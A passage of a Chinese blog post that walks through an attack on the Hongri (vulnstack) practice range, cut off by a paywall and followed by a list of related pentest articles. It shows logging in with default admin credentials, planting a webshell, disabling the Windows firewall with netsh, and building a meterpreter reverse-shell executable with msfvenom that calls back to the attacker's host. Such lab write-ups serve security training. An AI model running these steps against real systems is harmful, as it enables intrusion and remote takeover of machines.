2024年内网域渗透总结——红日靶场①_红日靶机账号密码

最新推荐文章于 2024-10-18 11:31:33 发布
最新推荐文章于 2024-10-18 11:31:33 发布
阅读量424 收藏 13
点赞数 25
分类专栏: 程序员 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264096/article/details/138363197
版权
进入yxcms后台
#网址输入:http://192.168.43.17/yxcms/index.php?r=admin
#admin 
#123456

利用文件上传

蚁剑连接
#小提一下,马子上传了,不知道马子绝对路径怎么办?
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后,可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default

​​

#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php



至此,已经拿到Webshell

三、后渗透

后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。

蚁剑终端关闭win7防火墙
#关闭win防火墙
netsh advfirewall set allprofiles state off 
#查看防火墙配置状态
netsh advfirewall show allprofile state

msf生成exe并开启监听
#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe 

#蚁剑上传233.exe
#蚁剑终端运行233.exe

#kali开启监听
最低0.47元/天 解锁文章
2401_84264096
关注
专栏目录
Docker系列教程01-使用Docker镜像_开源docker镜像 如何使用
2301_77118221的博客
04-26 352
Docker镜像是一个只读的模板。如果读者之前是VM管理员,则可以把Docker镜像理解为VM模板,如果您是一名研发人员,可以将镜像理解为类(class)。简单说,Docker镜像是一个不包含系统内核而又精简的操作系统。例如:一个镜像可以包含一个基本的 ubuntu 操作系统环境,里面仅安装了 Nginx 应用程序。可以把它称为Nginx镜像。
内网渗透——红日靶机学习(一)
jammny
11-13 6399
前言 开启内网学习,渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(控):192.168.52.138 WIN2003(成员):192.168.52.141 渗透测试 一、外网打点 信息收..
红日安全红队靶场(三)一次简单的内网渗透
白帽技术与网络安全
07-24 6208
1、靶场介绍及设置这是红日团队的第三套靶场靶场下载地址见文末),本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及渗透等多种知识点。该靶场环境由5台机器组成,其...
内网靶场 | 渗透攻击红队内网渗透靶场-1(Metasploit)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
10-04 1594
外网和内网前面部分大致路线与上一期相同,这一次主要用的MSF进行上线、代理等操作,在渗透部分与上一期相比使用了不同的手法:查看到SQLSERVER-2008的系统信息后去网络上搜集对应版本的提权漏洞,然后尝试提权;可以看到默认是监听本地的8080端口,支持9种类型的payload,这里使用PSH,反弹shell的payload使用windows/x64/meterpreter/reverse_tcp。尝试了多次才成功,拿到了WORK-7的SYSTEM权限,查看系统信息可以看到存在REDTEAM。
记一次自己搭建内网靶场(非常详细),零基础入门到精通,看这一篇就够了
最新发布
weixin_51725318的博客
10-18 1720
记一次自己搭建内网靶场(非常详细),零基础入门到精通,看这一篇就够了
内网渗透总结——红日靶场
weixin_74545038的博客
11-08 841
红日靶场一学习笔记
内网渗透总结红日靶场一)
未完成的歌~的博客
04-11 7453
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
Vulnstack红日安全内网渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
渗透总结
qq_44657899的博客
08-02 763
文章目录内用户枚举和密码喷洒攻击(Password Spraying)渗透之Kerberoast攻击请求服务票据导出服务票据离线破解 内用户枚举和密码喷洒攻击(Password Spraying) 原理: 在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对内进行用户枚举和密码喷洒攻击 攻击下载地址:https://github.com/ropnop/ke
内网渗透总结——红日靶场_红日靶机账号密码
2401_83974590的博客
04-29 369
外网:192.168.43.17内网:192.168.52.143可以Ping通外网通192.168.52.138(win2008)通192.168.52.141(win2003)小皮必须是自带的,下载的新版本会导致kali机连接目标失败问题原理:自行理解内网两台不出网win互通win7开启phpstudywin11访问80端口得到phpstudy探针#发现开启了80,3306端口#访问发现80端口是php探针。
2024运维最新内网渗透总结——红日靶场_红日靶机账号密码(2),2024最新最新大厂Linux运维校招面试经验汇总
05-04 703
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 2909
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
内网渗透实践——红日靶场
qq_42739469的博客
11-05 359
这一台web服务器具有外部的公网IP地址(192.168.5.134)也具有整个内部的内网ip,那么我们首先的思路就是拿下这一台web服务器作为我们入侵整个内网的跳板。直到成功创建会话,然后我们使用getuid来查看我们登陆的用户名称以及用户组,发现权限不够需要提权,于是我们使用getsystem进行提权。需要注意的是,在这样的设置中我们的监听主机应该设置跳板机的ip。在清晰了入侵目标以后,我们需要做的就是让kali上的更多工具能够访问到内网,我们才能更快更高效的拿下DC。
红日靶场内网渗透(一)
m0_52923241的博客
02-07 4184
适合第一次搭建内网的师傅们——红日靶场内网渗透(一) 文章目录一、环境搭建二、渗透思路2.1 信息收集2.2 漏洞发现漏洞一:弱口令漏洞二:xss漏洞三:任意文件读取漏洞四:phpmyadmin文件写入2.3 漏洞利用2.4 内网渗透三、常见知识点3.1 探针文件3.2 yxcms1.2.1四、常用工具4.1 nmap4.2 蚁剑4.3 cs4.4 msf 一、环境搭建 前言:第一次搭建内网环境,花了两天时间。终于是搞清楚了各种配置,和每个主机之间的关系 靶机下载链接:红日实战靶场,一共三个靶机
内网渗透——红日靶场总结
m0_52403371的博客
07-02 904
内网渗透——红日靶场总结
渗透小结
a3320315的博客
05-09 317
参考连接
红日内网渗透靶场1
weixin_47781572的博客
10-10 2266
官方下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2253
红日靶场渗透教程
搭建与渗透内网环境:DNS与权限揭秘
本文档深入解析了渗透技术的基础概念和实战过程,主要针对Windows环境进行讲解。作者wilson首先介绍了环境的搭建,包括设置DNS服务器和控制器(如Win2008作为控,IP为192.168.233.145,名为wilson.com)...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值